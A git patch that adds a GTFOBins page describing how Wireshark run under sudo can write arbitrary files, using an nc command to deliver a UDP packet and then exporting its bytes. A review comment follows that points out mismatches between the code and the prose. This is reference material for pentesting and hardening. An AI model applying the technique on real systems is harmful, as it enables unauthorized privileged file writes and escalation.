From 74e021e8ef124030878bc3671e675411cdaf5c1a Mon Sep 17 00:00:00 2001 From: Gauthier Sebaux Date: Thu, 27 Jan 2022 14:53:26 +0100 Subject: [PATCH] Add wireshark sudo file write Co-authored-by: Andrea Cardaci --- _gtfobins/wireshark.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/wireshark.md diff --git a/_gtfobins/wireshark.md b/_gtfobins/wireshark.md new file mode 100644 index 0000000..55cfc9f --- /dev/null +++ b/_gtfobins/wireshark.md @@ -0,0 +1,18 @@ +--- +functions: + sudo: + - description: | + This technique can be used to write arbitrary files, i.e., the dump of one UDP packet. + + After starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved: + + 1. select the only received packet; + + 2. right-click on "Data" from the "Packet Details" pane, and select "Export Packet Bytes..."; + + 3. choose where to save the packet dump. + code: | + PORT=4444 + sudo wireshark -c 1 -i lo -k -f "udp port $PORT" & + echo 'DATA' | nc -u 127.127.127.127 "$PORT" +---
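Review bot: in the `code:` block, the `sudo wireshark ... &` line and the `nc` line run back to back, which contradicts the description's "After starting Wireshark, and waiting for the capture to begin, deliver the UDP packet". As written, anyone who copies the block sends the datagram before the capture is live, and a backgrounded `sudo` cannot prompt for a password. I suggest dropping the `&` and adding a comment that the `nc` line is run from a second terminal once the capture has started, so that the code matches the prose. Two smaller documentation points in the same hunk: `127.127.127.127` is used without explanation where readers will expect `127.0.0.1`, so either switch or add a comment saying why; and "write arbitrary files, i.e., the dump of one UDP packet" overstates what step 2 does, since exporting "Data" saves only that field's bytes. The description should say that the written content is the bytes of the "Data" field and that the file is created by the Wireshark process started under `sudo`.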